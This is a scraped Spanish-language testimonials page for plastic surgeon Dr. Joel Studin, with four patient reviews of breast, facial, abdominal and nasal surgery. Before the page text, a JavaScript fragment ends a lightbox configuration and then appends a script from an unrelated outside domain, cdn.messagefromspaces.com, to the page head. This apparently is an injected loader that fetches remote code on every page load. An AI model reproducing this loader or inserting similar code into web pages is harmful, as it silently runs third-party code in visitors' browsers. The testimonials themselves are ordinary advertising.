, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); }) Testimoniales | Dr. Joel Studin | Formanueva.com
Joel R. Studin, MD, FACS
Cirugía Plástica y Estética

Testimoniales

¡Fui al Dr. Studin para un aumento de mama y no podría estar más contenta! Desde el personal tan maravilloso y las consultas precedente a la cirugía, hasta mi recuperación, todo fue una gran experiencia. Durante mi primera consulta el Dr. Studin paso más de una hora respondiendo a todas mis preguntas sin ninguna prisa. Mis senos son del tamaño perfecto, se ven y se sienten muy natural y la cicatrización es mínima. ¡Sin duda alguna repetiría el proceso! Recomiendo el Dr. Studin a cualquiera que esté considerando esta operación.

Rachel- NY, NY

Gracias Dr. Studin – Hace dos años el Dr. Studin nos hizo un estiramiento facial a mi madre y a mi. No solo nos sentimos mas unidas por esta experiencia, pero los resultados también fueron fenomenales. No podríamos haber pedido un rostro más rejuvenecido. La recuperación fue rápida, los hematomas y la hinchazón disminuyeron en tan sólo cuatro días sin cicatriz alguna. Me encantan todos los elogios que he recibido de mi familia y amigos. Me encanta verme 15 años más joven!

Jonanne – NY

No existen palabras para expresar la felicidad que siento, ni como el Dr. Studin convirtió mis sueños en realidad! Después de tener 3 hijos, mi cuerpo se transformó por completo. Yo deseaba tanto volver a tener una cintura pequeña y por esa razón decidí hacerme una abdominoplastia. ¡Sinceramente, no podría estar más feliz con los resultados, mi abdomen no se ha visto tan bien en años! Finalmente me siento segura de mi misma y puedo volver a lucir trajes de baño y camisetas que resalten mi figura. Además de estar muy satisfecha con los resultados, estoy muy contenta con la experiencia completa, desde el trato en el consultorio hasta las visitas precedentes. Todo el personal fue muy atento y amable. El Dr. Studin es más que un cirujano increíble, sin ninguna duda lo recomiendo a todas las madres. Es una experiencia realmente transformadora.

Stephanie – NJ

¡En general, mi cirugía de rinoplastia fue una experiencia nada menos que increíble! Antes no estaba contenta con el tamaño ni la forma de mi nariz. El Dr. Studin hizo que mi nariz se viera mejor al darle una forma más natural que concuerda con mi cara perfectamente. Cuando fuí a mi primera consulta de 45 minutos, pude ver mis resultados finales a través de imágenes computarizadas. El Dr. Studin contesto todas mis preguntas sin prisa alguna y me hizo sentir cómoda al explicarme todo el proceso de cirugía. Estoy muy contenta y definitivamente recomendaría que cualquiera fuera tratado por el Dr. Studin. ¡Realmente es el mejor cirujano!

Heather- Queens, NY

Llame o envié un E-mail para una cita con el Dr. Studin
Haga Clic en Like para seguirnos en Facebook ¡Reciba descuentos exclusivos!
Desea mejorar su apariencia sin cirugía plástica? Esto puede ser solucionado con una visita durante su hora de almuerzo
Llame o envié un email para una cita con el Dr. Studin
¡Únase a 5,000+ subscriptores! Reciba los artículos más recientes en su correo electrónico. ¡Regístrese ahora!

American Society of Plastic Surgeons
The American Society for Aesthetic Plastic Surgery, Inc
American Board of Plastic Surgery